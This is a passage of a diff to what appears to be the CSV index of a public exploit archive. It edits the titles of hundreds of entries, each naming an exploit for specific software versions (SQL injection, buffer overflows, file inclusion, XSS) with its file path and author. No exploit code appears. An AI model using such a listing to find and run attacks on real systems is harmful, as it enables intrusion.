+25130,platforms/windows/local/25130.py,"FuzeZip 1.0.0.131625 - Buffer Overflow (SEH)",2013-05-01,RealPentesting,windows,local,0 +25131,platforms/windows/local/25131.py,"WinArchiver 3.2 - Buffer Overflow (SEH)",2013-05-01,RealPentesting,windows,local,0 25132,platforms/multiple/remote/25132.txt,"Bontago Game Server 1.1 - Remote Nickname Buffer Overrun",2005-02-21,"Luigi Auriemma",multiple,remote,0 25133,platforms/multiple/remote/25133.txt,"xinkaa Web station 1.0.3 - Directory Traversal",2005-02-21,"Luigi Auriemma",multiple,remote,0 25134,platforms/linux/local/25134.c,"sudo 1.8.0-1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURemote Code Execution Bypass",2013-05-01,aeon,linux,local,0 @@ -22349,7 +22350,7 @@ id,file,description,date,author,platform,type,port 25205,platforms/multiple/remote/25205.txt,"Techland XPand Rally 1.0/1.1 - Remote Format String",2005-03-10,"Luigi Auriemma",multiple,remote,0 25206,platforms/php/webapps/25206.txt,"phpoutsourcing zorum 3.5 - Multiple Vulnerabilities",2005-03-10,benjilenoob,php,webapps,0 25207,platforms/windows/remote/25207.txt,"py software active webcam WebServer 4.3/5.5 - Multiple Vulnerabilities",2005-03-10,Sowhat,windows,remote,0 -25208,platforms/php/webapps/25208.txt,"All Enthusiast PhotoPost PHP Pro 5.0 - adm-photo.php Arbitrary Image manipulation",2005-03-10,"Igor Franchuk",php,webapps,0 +25208,platforms/php/webapps/25208.txt,"All Enthusiast PhotoPost PHP Pro 5.0 - adm-photo.php Arbitrary Image Manipulation",2005-03-10,"Igor Franchuk",php,webapps,0 25209,platforms/multiple/remote/25209.pl,"MySQL 4.x - CREATE FUNCTION Arbitrary libc Code Execution",2005-03-11,"Stefano Di Paola",multiple,remote,0 25210,platforms/multiple/remote/25210.php,"MySQL 4.x - CREATE FUNCTION mysql.func Table Arbitrary Library Injection",2005-03-11,"Stefano Di Paola",multiple,remote,0 25211,platforms/multiple/remote/25211.c,"MySQL 4.x - CREATE Temporary TABLE Symlink Privilege Escalation",2006-01-18,"Marco Ivaldi",multiple,remote,0 @@ -22373,7 +22374,7 @@ id,file,description,date,author,platform,type,port 25229,platforms/php/webapps/25229.txt,"PHPOpenChat 2.3.4/3.0.1 - ENGLISH_poc.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25230,platforms/php/webapps/25230.txt,"PunBB 1.2.3 - Multiple HTML Injection Vulnerabilities",2005-03-16,"benji lemien",php,webapps,0 25231,platforms/windows/dos/25231.txt,"Microsoft Windows 2000/2003/XP - Graphical Device Interface Library Denial of Service",2005-03-17,"Hongzhen Zhou",windows,dos,0 -25232,platforms/php/webapps/25232.txt,"McNews 1.x - install.php Arbitrary File Include",2005-03-17,"Jonathan Whiteley",php,webapps,0 +25232,platforms/php/webapps/25232.txt,"McNews 1.x - install.php Arbitrary File Inclusion",2005-03-17,"Jonathan Whiteley",php,webapps,0 25233,platforms/asp/webapps/25233.txt,"ACS Blog 0.8/0.9/1.0/1.1 - search.asp Cross-Site Scripting",2005-03-17,"farhad koosha",asp,webapps,0 25234,platforms/linux/dos/25234.sh,"Linux Kernel 2.4.x / 2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities",2005-03-17,"Michal Zalewski",linux,dos,0 25235,platforms/php/webapps/25235.txt,"Subdreamer 1.0 - SQL Injection",2005-03-18,"GHC team",php,webapps,0 @@ -22386,7 +22387,7 @@ id,file,description,date,author,platform,type,port 25242,platforms/php/webapps/25242.txt,"Ciamos 0.9.2 - Highlight.php File Disclosure",2005-03-19,"Majid NT",php,webapps,0 25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script - Remote File Inclusion",2005-03-21,Frank_Reiner,php,webapps,0 25244,platforms/php/webapps/25244.txt,"CzarNews 1.13/1.14 - headlines.php Remote File Inclusion",2005-03-21,brOmstar,php,webapps,0 -25245,platforms/php/webapps/25245.txt,"Social Site Generator 2.2 - Cross-Site Request Forgery (Add Admin) Exploit",2013-05-06,Fallaga,php,webapps,0 +25245,platforms/php/webapps/25245.txt,"Social Site Generator 2.2 - Cross-Site Request Forgery (Add Admin)",2013-05-06,Fallaga,php,webapps,0 25247,platforms/php/webapps/25247.txt,"Craigslist Gold - SQL Injection",2013-05-06,Fallaga,php,webapps,0 25248,platforms/php/webapps/25248.txt,"Joomla DJ Classifieds Extension 2.0 - Blind SQL Injection",2013-05-06,Napsterakos,php,webapps,0 25249,platforms/php/webapps/25249.txt,"Webid 1.0.6 - Multiple Vulnerabilities",2013-05-06,"Ahmed Aboul-Ela",php,webapps,0 @@ -22394,9 +22395,9 @@ id,file,description,date,author,platform,type,port 25251,platforms/hardware/webapps/25251.txt,"D-Link DSL-320B - Multiple Vulnerabilities",2013-05-06,m-1-k-3,hardware,webapps,0 25252,platforms/asp/webapps/25252.txt,"BetaParticle blog 2.0/3.0 - dbBlogMX.mdb Direct Request Database Disclosure",2005-03-21,"farhad koosha",asp,webapps,0 25253,platforms/asp/webapps/25253.txt,"BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated File Upload",2005-03-21,"farhad koosha",asp,webapps,0 -25254,platforms/asp/webapps/25254.txt,"BetaParticle blog 2.0/3.0 - myFiles.asp Unauthenticated File manipulation",2005-03-21,"farhad koosha",asp,webapps,0 +25254,platforms/asp/webapps/25254.txt,"BetaParticle blog 2.0/3.0 - myFiles.asp Unauthenticated File Manipulation",2005-03-21,"farhad koosha",asp,webapps,0 25255,platforms/windows/dos/25255.txt,"FUN labs Game Engine - Multiple Remote Denial of Service Vulnerabilities",2005-03-20,"Luigi Auriemma",windows,dos,0 -25256,platforms/osx/local/25256.c,"Apple Mac OS X 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,osx,local,0 +25256,platforms/osx/local/25256.c,"Apple Mac OSX 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,osx,local,0 25257,platforms/php/webapps/25257.txt,"Kayako ESupport 2.3 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-03-22,"James Bercegay",php,webapps,0 25258,platforms/php/webapps/25258.txt,"Phorum 3.x/5.0.x - HTTP Response Splitting",2005-03-22,"Alexander Anisimov",php,webapps,0 25259,platforms/windows/dos/25259.py,"Microsoft Windows XP - Local Denial of Service",2005-03-22,liquid@cyberspace.org,windows,dos,0 @@ -22443,7 +22444,7 @@ id,file,description,date,author,platform,type,port 25302,platforms/php/webapps/25302.txt,"PHPCOIN 1.2 - auxpage.php page Parameter Traversal Arbitrary File Access",2005-03-29,"James Bercegay",php,webapps,0 25303,platforms/linux/dos/25303.txt,"Multiple Vendor Telnet Client - Env_opt_add Heap Based Buffer Overflow",2005-03-28,"Gael Delalleau",linux,dos,0 25304,platforms/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,php,webapps,0 -25305,platforms/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure Exploit",2013-05-08,HTP,multiple,webapps,0 +25305,platforms/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure",2013-05-08,HTP,multiple,webapps,0 33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 - Administration Interface admin/PHPshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 33407,platforms/php/webapps/33407.txt,"Horde 3.3.5 - Administration Interface admin/cmdshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 33408,platforms/php/webapps/33408.txt,"Horde 3.3.5 - Administration Interface admin/sqlshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 @@ -22478,7 +22479,7 @@ id,file,description,date,author,platform,type,port 25336,platforms/windows/remote/25336.txt,"Logics Software LOG-FT - Arbitrary File Disclosure",2005-04-05,"Pedro Viuales and Rom Ramirez",windows,remote,0 25337,platforms/php/webapps/25337.txt,"ProfitCode Software PayProCart 3.0 - Usrdetails.php Cross-Site Scripting",2005-04-05,"Diabolic Crab",php,webapps,0 25338,platforms/php/webapps/25338.txt,"profitcode software payprocart 3.0 - Directory Traversal",2005-04-05,"Diabolic Crab",php,webapps,0 -25339,platforms/php/webapps/25339.txt,"PHP-Nuke 6.x/7.x - Your_Account Module Username Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps,0 +25339,platforms/php/webapps/25339.txt,"PHP-Nuke 6.x/7.x - Your_Account Module 'Username' Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps,0 25340,platforms/php/webapps/25340.txt,"PHP-Nuke 6.x/7.x - Your_Account Module Avatarcategory Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps,0 25341,platforms/php/webapps/25341.html,"PHP-Nuke 6.x/7.x - Downloads Module Lid Parameter Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps,0 25342,platforms/php/webapps/25342.txt,"PHP-Nuke 7.6 - Web_Links Module Multiple Cross-Site Scripting Vulnerabilities",2005-04-06,"Maksymilian Arciemowicz",php,webapps,0 @@ -22502,7 +22503,7 @@ id,file,description,date,author,platform,type,port 25360,platforms/php/webapps/25360.txt,"PHP-Nuke 7.6 Web_Links Module - Multiple SQL Injections",2005-04-07,"Maksymilian Arciemowicz",php,webapps,0 25361,platforms/irix/local/25361.txt,"SGI IRIX 6.5.22 - GR_OSView Information Disclosure",2005-04-07,anonymous,irix,local,0 25362,platforms/irix/local/25362.txt,"SGI IRIX 6.5.22 - GR_OSView Local Arbitrary File Overwrite",2005-04-07,anonymous,irix,local,0 -25363,platforms/windows/dos/25363.py,"Lan Messenger - sending PM Buffer Overflow 'UNICODE' Overwrite SEH",2013-05-11,ariarat,windows,dos,0 +25363,platforms/windows/dos/25363.py,"Lan Messenger - sending PM 'UNICODE' Overwrite Buffer Overflow (SEH)",2013-05-11,ariarat,windows,dos,0 25364,platforms/windows/dos/25364.txt,"AN HTTPD - CMDIS.dll Remote Buffer Overflow",2005-04-08,"Tan Chew Keong",windows,dos,0 25365,platforms/windows/remote/25365.txt,"AN HTTPD 1.42 - Arbitrary Log Content Injection",2005-04-08,"Tan Chew Keong",windows,remote,0 25366,platforms/php/webapps/25366.txt,"PostNuke Phoenix 0.760 RC3 - OP Parameter Cross-Site Scripting",2005-04-08,Dcrab,php,webapps,0 @@ -22515,7 +22516,7 @@ id,file,description,date,author,platform,type,port 25373,platforms/php/webapps/25373.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - view.php id Parameter Cross-Site Scripting",2005-04-09,kre0n,php,webapps,0 25374,platforms/php/webapps/25374.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - view.php id Parameter SQL Injection",2005-04-09,kre0n,php,webapps,0 25375,platforms/linux/remote/25375.pl,"KDE KMail 1.7.1 - HTML EMail Remote Email Content Spoofing",2005-04-11,"Noam Rathaus",linux,remote,0 -25376,platforms/php/webapps/25376.txt,"ModernGigabyte ModernBill 4.3 - news.php File Include",2005-04-10,"James Bercegay",php,webapps,0 +25376,platforms/php/webapps/25376.txt,"ModernGigabyte ModernBill 4.3 - news.php File Inclusion",2005-04-10,"James Bercegay",php,webapps,0 25377,platforms/php/webapps/25377.txt,"ModernGigabyte ModernBill 4.3 - C_CODE Parameter Cross-Site Scripting",2005-04-11,"James Bercegay",php,webapps,0 25378,platforms/php/webapps/25378.txt,"ModernGigabyte ModernBill 4.3 - Aid Parameter Cross-Site Scripting",2005-04-11,"James Bercegay",php,webapps,0 25379,platforms/php/webapps/25379.txt,"Zoom Media Gallery 2.1.2 - 'index.php' SQL Injection",2005-04-11,"Andreas Constantinides",php,webapps,0 @@ -22621,7 +22622,7 @@ id,file,description,date,author,platform,type,port 25484,platforms/asp/webapps/25484.txt,"DUportal 3.1.2 - inc_rating.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25486,platforms/windows/remote/25486.txt,"RaidenFTPd 2.4 - Unauthorized File Access",2005-04-21,"Lachlan. H",windows,remote,0 25487,platforms/windows/remote/25487.txt,"yawcam 0.2.5 - Directory Traversal",2005-04-21,"Donato Ferrante",windows,remote,0 -25488,platforms/php/webapps/25488.txt,"ProfitCode Software PayProCart 3.0 - Username Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 +25488,platforms/php/webapps/25488.txt,"ProfitCode Software PayProCart 3.0 - 'Username' Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 25489,platforms/php/webapps/25489.txt,"ProfitCode Software PayProCart 3.0 - Ckprvd Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 25490,platforms/php/webapps/25490.txt,"ProfitCode Software PayProCart 3.0 - AdminShop HDoc Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 25491,platforms/php/webapps/25491.txt,"ProfitCode Software PayProCart 3.0 - AdminShop ModID Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 @@ -22664,7 +22665,7 @@ id,file,description,date,author,platform,type,port 25528,platforms/php/webapps/25528.txt,"WoltLab Burning Board 2.3.1 - PMS.php Cross-Site Scripting",2005-04-25,deluxe89,php,webapps,0 25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 - default.asp Multiple SQL Injection",2005-04-25,Dcrab,asp,webapps,0 25530,platforms/asp/webapps/25530.txt,"OneWorldStore - IDOrder Information Disclosure",2005-04-25,Lostmon,asp,webapps,0 -25531,platforms/php/webapps/25531.html,"PHPMyVisites 1.3 - Set_Lang File Include",2005-04-26,"Max Cerny",php,webapps,0 +25531,platforms/php/webapps/25531.html,"PHPMyVisites 1.3 - Set_Lang File Inclusion",2005-04-26,"Max Cerny",php,webapps,0 25532,platforms/php/webapps/25532.txt,"Yappa-NG 1.x/2.x - Unspecified Remote File Inclusion",2005-04-24,"James Bercegay",php,webapps,0 25533,platforms/php/webapps/25533.txt,"Yappa-NG 1.x/2.x - Unspecified Cross-Site Scripting",2005-04-24,"James Bercegay",php,webapps,0 25534,platforms/php/webapps/25534.txt,"SqWebMail 3.x/4.0 - HTTP Response Splitting",2005-04-15,Zinho,php,webapps,0 @@ -22729,7 +22730,7 @@ id,file,description,date,author,platform,type,port 25595,platforms/asp/webapps/25595.txt,"ASP Inline Corporate Calendar 3.6.3 - Defer.asp SQL Injection",2005-05-04,Zinho,asp,webapps,0 25596,platforms/asp/webapps/25596.txt,"ASP Inline Corporate Calendar 3.6.3 - Details.asp SQL Injection",2005-05-04,Zinho,asp,webapps,0 25597,platforms/windows/remote/25597.txt,"Adobe SVG Viewer 3.0 - ActiveX Control SRC Information Disclosure",2005-05-04,"Robert Fly",windows,remote,0 -25598,platforms/osx/remote/25598.txt,"Apple Mac OS X 10.x - BlueTooth Directory Traversal",2005-05-04,"Kevin Finisterre",osx,remote,0 +25598,platforms/osx/remote/25598.txt,"Apple Mac OSX 10.x - BlueTooth Directory Traversal",2005-05-04,"Kevin Finisterre",osx,remote,0 25599,platforms/php/webapps/25599.txt,"Interspire articlelive 2005 - Multiple Vulnerabilities",2005-05-04,Dcrab,php,webapps,0 25600,platforms/windows/remote/25600.txt,"simplecam 1.2 - Directory Traversal",2005-05-04,"Donato Ferrante",windows,remote,0 25601,platforms/php/webapps/25601.txt,"FishCart 3.1 - display.php nlst Parameter Cross-Site Scripting",2005-05-04,Dcrab,php,webapps,0 @@ -22823,7 +22824,7 @@ id,file,description,date,author,platform,type,port 25683,platforms/php/webapps/25683.txt,"Help Center Live 1.0/1.2.x - Multiple Input Validation Vulnerabilities",2005-05-24,"GulfTech Security",php,webapps,0 25684,platforms/hardware/remote/25684.html,"D-Link DSL Router - Remote Authentication Bypass",2005-05-19,"Francesco Orro",hardware,remote,0 25685,platforms/jsp/webapps/25685.txt,"Sun JavaMail 1.3 - API MimeMessage Infromation Disclosure",2005-05-19,"Ricky Latt",jsp,webapps,0 -25686,platforms/php/webapps/25686.txt,"PHP Advanced Transfer Manager 1.21 - Arbitrary File Include",2005-05-19,"Ingvar Gilbert",php,webapps,0 +25686,platforms/php/webapps/25686.txt,"PHP Advanced Transfer Manager 1.21 - Arbitrary File Inclusion",2005-05-19,"Ingvar Gilbert",php,webapps,0 25687,platforms/freebsd/remote/25687.c,"Picasm 1.10/1.12 - Error Generation Remote Buffer Overflow",2005-05-20,"Shaun Colley",freebsd,remote,0 25688,platforms/linux/local/25688.txt,"Gedit 2.x - Filename Format String",2005-05-30,jsk:exworm,linux,local,0 25689,platforms/php/webapps/25689.txt,"EJ3 TOPo 2.2 - Multiple index.php Cross-Site Scripting Vulnerabilities",2003-05-20,Lostmon,php,webapps,0 @@ -22957,8 +22958,8 @@ id,file,description,date,author,platform,type,port 25806,platforms/php/webapps/25806.txt,"Invision Power Services Invision Gallery 1.0.1/1.3 - SQL Injection",2005-06-09,"James Bercegay",php,webapps,0 25807,platforms/aix/dos/25807.txt,"IBM AIX 5.x - Invscout Local Buffer Overflow",2005-06-09,"Computer Academic Underground",aix,dos,0 25808,platforms/php/webapps/25808.txt,"Invision Community Blog 1.0/1.1 - Multiple Input Validation Vulnerabilities",2005-06-09,"James Bercegay",php,webapps,0 -25809,platforms/osx/dos/25809.py,"CodeBlocks 12.11 (OS X) - Crash (PoC)",2013-05-29,ariarat,osx,dos,0 -25810,platforms/hardware/webapps/25810.py,"TP-Link WR842ND - Remote Multiple SSID Directory Traversal Exploit",2013-05-29,"Adam Simuntis",hardware,webapps,0 +25809,platforms/osx/dos/25809.py,"CodeBlocks 12.11 (OSX) - Crash (PoC)",2013-05-29,ariarat,osx,dos,0 +25810,platforms/hardware/webapps/25810.py,"TP-Link WR842ND - Remote Multiple SSID Directory Traversal",2013-05-29,"Adam Simuntis",hardware,webapps,0 25811,platforms/hardware/webapps/25811.py,"YeaLink IP Phone Firmware 9.70.0.100 - Unauthenticated Phone Call",2013-05-29,b0rh,hardware,webapps,0 25812,platforms/hardware/webapps/25812.txt,"TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 25813,platforms/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 @@ -22987,7 +22988,7 @@ id,file,description,date,author,platform,type,port 25846,platforms/php/webapps/25846.txt,"cPanel 9.1 - User Parameter Cross-Site Scripting",2005-05-20,abducter_minds@yahoo.com,php,webapps,0 25847,platforms/asp/webapps/25847.txt,"LaGarde StoreFront 5.0 Shopping Cart - 'login.asp' SQL Injection",2003-12-07,G00db0y,asp,webapps,0 25848,platforms/php/webapps/25848.pl,"PAFaq beta4 - Database Unauthorized Access",2005-06-20,james,php,webapps,0 -25849,platforms/php/webapps/25849.txt,"PhpTax 0.8 - File manipulation (newvalue) Remote Code Execution",2013-05-31,"CWH Underground",php,webapps,0 +25849,platforms/php/webapps/25849.txt,"PhpTax 0.8 - File Manipulation (newvalue) Remote Code Execution",2013-05-31,"CWH Underground",php,webapps,0 26289,platforms/cgi/webapps/26289.txt,"Alkalay.Net Multiple Scripts - Arbitrary Remote Command Execution Vulnerabilities",2005-08-21,sullo@cirt.net,cgi,webapps,0 26290,platforms/cgi/webapps/26290.txt,"PerlDiver 2.31 - Perldiver.cgi Cross-Site Scripting",2005-08-21,"Donnie Werner",cgi,webapps,0 26291,platforms/asp/webapps/26291.txt,"Mall23 - AddItem.asp SQL Injection",2005-08-21,SmOk3,asp,webapps,0 @@ -22997,7 +22998,7 @@ id,file,description,date,author,platform,type,port 25853,platforms/asp/webapps/25853.txt,"I-Gallery - Folder Argument Directory Traversal",2005-06-20,"Seyed Hamid Kashfi",asp,webapps,0 25854,platforms/php/webapps/25854.txt,"PAFaq - Question Cross-Site Scripting",2005-06-20,"James Bercegay",php,webapps,0 25855,platforms/asp/webapps/25855.txt,"I-Gallery - Folder Argument Cross-Site Scripting",2005-06-20,"Seyed Hamid Kashfi",asp,webapps,0 -25856,platforms/php/webapps/25856.txt,"PAFaq - Administrator Username SQL Injection",2005-06-20,"James Bercegay",php,webapps,0 +25856,platforms/php/webapps/25856.txt,"PAFaq - Administrator 'Username' SQL Injection",2005-06-20,"James Bercegay",php,webapps,0 25857,platforms/php/webapps/25857.txt,"RaXnet Cacti 0.5/0.6/0.8 - Config_Settings.php Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0 25858,platforms/asp/webapps/25858.txt,"DUware DUportal 3.4.3 Pro - Multiple SQL Injections",2005-06-22,"Dedi Dwianto",asp,webapps,0 25859,platforms/php/webapps/25859.txt,"RaXnet Cacti 0.5/0.6/0.8 - Top_Graph_Header.php Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0 @@ -23099,8 +23100,8 @@ id,file,description,date,author,platform,type,port 25956,platforms/asp/webapps/25956.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0 25957,platforms/php/webapps/25957.txt,"PunBB 1.x - profile.php User Profile Edit Module SQL Injection",2005-07-08,"Stefan Esser",php,webapps,0 25958,platforms/php/webapps/25958.txt,"ID Team ID Board 1.1.3 - SQL.CLS.php SQL Injection",2005-07-10,Defa,php,webapps,0 -25959,platforms/php/webapps/25959.txt,"Spid 1.3 - lang_path File Include",2005-07-11,"skdaemon porra",php,webapps,0 -25960,platforms/php/webapps/25960.txt,"PPA 0.5.6 - ppa_root_path File Include",2005-07-10,"skdaemon porra",php,webapps,0 +25959,platforms/php/webapps/25959.txt,"Spid 1.3 - lang_path File Inclusion",2005-07-11,"skdaemon porra",php,webapps,0 +25960,platforms/php/webapps/25960.txt,"PPA 0.5.6 - ppa_root_path File Inclusion",2005-07-10,"skdaemon porra",php,webapps,0 25961,platforms/windows/local/25961.c,"SoftiaCom wMailServer 1.0 - Local Information Disclosure",2005-07-09,fRoGGz,windows,local,0 25962,platforms/asp/dos/25962.xml,"Microsoft ASP.NET 1.0/1.1 - RPC/Encoded Remote Denial of Service",2005-07-12,"Bryan Sullivan",asp,dos,0 25963,platforms/asp/webapps/25963.txt,"Dragonfly Commerce 1.0 - Multiple SQL Injections",2005-07-12,"Diabolic Crab",asp,webapps,0 @@ -23114,7 +23115,7 @@ id,file,description,date,author,platform,type,port 25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php urlConfig Parameter' Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 25972,platforms/windows/dos/25972.py,"PEStudio 3.69 - Denial of Service",2013-06-05,"Debasish Mandal",windows,dos,0 25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - (tinybrowser.php folder Parameter) Directory Traversal",2013-06-05,expl0i13r,php,webapps,0 -25974,platforms/osx/dos/25974.txt,"Apple Mac OS X Server - DirectoryService Buffer Overflow",2013-06-05,"Core Security",osx,dos,0 +25974,platforms/osx/dos/25974.txt,"Apple Mac OSX Server - DirectoryService Buffer Overflow",2013-06-05,"Core Security",osx,dos,0 25975,platforms/linux/remote/25975.rb,"MiniUPnPd 1.0 - Stack Buffer Overflow Remote Code Execution",2013-06-05,Metasploit,linux,remote,5555 25976,platforms/hardware/webapps/25976.txt,"DS3 - Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps,0 25977,platforms/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",jsp,webapps,0 @@ -23190,9 +23191,9 @@ id,file,description,date,author,platform,type,port 26046,platforms/cgi/webapps/26046.txt,"@Mail 4.0/4.13 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-28,Lostmon,cgi,webapps,0 26047,platforms/php/webapps/26047.txt,"Easypx41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-29,FalconDeOro,php,webapps,0 26048,platforms/php/webapps/26048.txt,"Easypx41 - Multiple Variable Injection Vulnerabilities",2005-07-29,FalconDeOro,php,webapps,0 -26049,platforms/php/webapps/26049.txt,"VBZoom 1.0/1.11 - profile.php UserName Parameter Cross-Site Scripting",2005-07-29,almaster,php,webapps,0 +26049,platforms/php/webapps/26049.txt,"VBZoom 1.0/1.11 - profile.php 'Username' Parameter Cross-Site Scripting",2005-07-29,almaster,php,webapps,0 26050,platforms/php/webapps/26050.txt,"VBZoom 1.0/1.11 - 'login.php' UserID Parameter Cross-Site Scripting",2005-07-29,almaster,php,webapps,0 -26051,platforms/php/webapps/26051.txt,"Kayako LiveResponse 2.0 - 'index.php' username Parameter Cross-Site Scripting",2005-07-30,"James Bercegay",php,webapps,0 +26051,platforms/php/webapps/26051.txt,"Kayako LiveResponse 2.0 - 'index.php' 'Username' Parameter Cross-Site Scripting",2005-07-30,"James Bercegay",php,webapps,0 26052,platforms/php/webapps/26052.txt,"Kayako LiveResponse 2.0 - 'index.php' Calendar Feature Multiple Parameter SQL Injection",2005-07-30,"James Bercegay",php,webapps,0 26053,platforms/php/webapps/26053.txt,"PluggedOut CMS 0.4.8 - admin.php contenttypeid Parameter SQL Injection",2005-09-30,FalconDeOro,php,webapps,0 26054,platforms/php/webapps/26054.txt,"PluggedOut CMS 0.4.8 - admin.php Cross-Site Scripting",2005-09-30,FalconDeOro,php,webapps,0 @@ -23291,12 +23292,12 @@ id,file,description,date,author,platform,type,port 26144,platforms/php/webapps/26144.txt,"PHPTB Topic Board 2.0 - 'index.php' mid Parameter SQL Injection",2005-08-10,abducter_minds@yahoo.com,php,webapps,0 26145,platforms/multiple/dos/26145.c,"Wyse Winterm 1125SE 4.2/4.4 - Remote Denial of Service",2005-08-10,"Piotr Chytla",multiple,dos,0 26146,platforms/php/webapps/26146.txt,"VegaDNS 0.8.1/0.9.8/0.9.9 - 'index.php' Cross-Site Scripting",2005-08-10,dyn0,php,webapps,0 -26147,platforms/php/webapps/26147.txt,"MyBulletinBoard RC4 - 'index.php' Username Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 +26147,platforms/php/webapps/26147.txt,"MyBulletinBoard RC4 - 'index.php' 'Username' Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 26148,platforms/php/webapps/26148.txt,"MyBulletinBoard RC4 - member.php Multiple Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 26149,platforms/php/webapps/26149.txt,"MyBulletinBoard RC4 - polls.php polloptions Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 26150,platforms/php/webapps/26150.txt,"MyBulletinBoard RC4 - search.php action Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 26151,platforms/windows/remote/26151.txt,"Isemarket JaguarControl - ActiveX Control Buffer Overflow",2005-08-13,"Tacettin Karadeniz",windows,remote,0 -26152,platforms/osx/remote/26152.txt,"Apple Mac OS X 10.4 Weblog Server - Cross-Site Scripting",2005-08-15,"Donnie Werner",osx,remote,0 +26152,platforms/osx/remote/26152.txt,"Apple Mac OSX 10.4 Weblog Server - Cross-Site Scripting",2005-08-15,"Donnie Werner",osx,remote,0 26153,platforms/php/webapps/26153.txt,"My Image Gallery 1.4.1 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-08-16,anonymous,php,webapps,0 26154,platforms/asp/webapps/26154.txt,"PersianBlog - Userslist.asp SQL Injection",2005-08-16,trueend5,asp,webapps,0 26155,platforms/php/webapps/26155.txt,"Soft4e ECW-Shop 6.0.2 - 'index.php' SQL Injection",2005-08-16,"John Cobb",php,webapps,0 @@ -23312,7 +23313,7 @@ id,file,description,date,author,platform,type,port 26165,platforms/php/webapps/26165.txt,"PHPTB Topic Board 2.0 - file_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 26166,platforms/php/webapps/26166.txt,"PHPTB Topic Board 2.0 - tech_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 26167,platforms/windows/remote/26167.pl,"Microsoft Visual Studio .NET - msdds.dll Remote Code Execution",2005-08-17,anonymous,windows,remote,0 -26168,platforms/hardware/remote/26168.txt,"Juniper NetScreen 5.0 - VPN Username Enumeration",2005-08-18,"Roy Hills",hardware,remote,0 +26168,platforms/hardware/remote/26168.txt,"Juniper NetScreen 5.0 - VPN 'Username' Enumeration",2005-08-18,"Roy Hills",hardware,remote,0 26169,platforms/php/webapps/26169.txt,"W-Agora 4.2 - Site Parameter Directory Traversal",2005-08-18,matrix_killer,php,webapps,0 26170,platforms/php/webapps/26170.txt,"ATutor 1.5.1 - 'login.php' course Parameter Cross-Site Scripting",2005-08-18,matrix_killer,php,webapps,0 26171,platforms/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 - Prod.php Arbitrary Command Execution",2005-08-18,rgod,php,webapps,0 @@ -23329,7 +23330,7 @@ id,file,description,date,author,platform,type,port 26182,platforms/php/webapps/26182.txt,"Land Down Under 800 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-08-20,bl2k,php,webapps,0 26183,platforms/php/webapps/26183.txt,"NEPHP 3.0.4 - browse.php Cross-Site Scripting",2005-08-22,bl2k,php,webapps,0 26184,platforms/php/webapps/26184.txt,"PHPKit 1.6.1 - 'member.php' SQL Injection",2005-08-22,phuket,php,webapps,0 -26185,platforms/osx/local/26185.txt,"Apple Mac OS X 10.4 - dsidentity Directory Services Account Creation and Deletion",2005-08-15,"Neil Archibald",osx,local,0 +26185,platforms/osx/local/26185.txt,"Apple Mac OSX 10.4 - dsidentity Directory Services Account Creation and Deletion",2005-08-15,"Neil Archibald",osx,local,0 26186,platforms/php/webapps/26186.txt,"RunCMS 1.1/1.2 Newbb_plus and Messages Modules - Multiple SQL Injections",2005-08-22,"James Bercegay",php,webapps,0 26187,platforms/php/webapps/26187.txt,"PostNuke 0.76 RC4b - 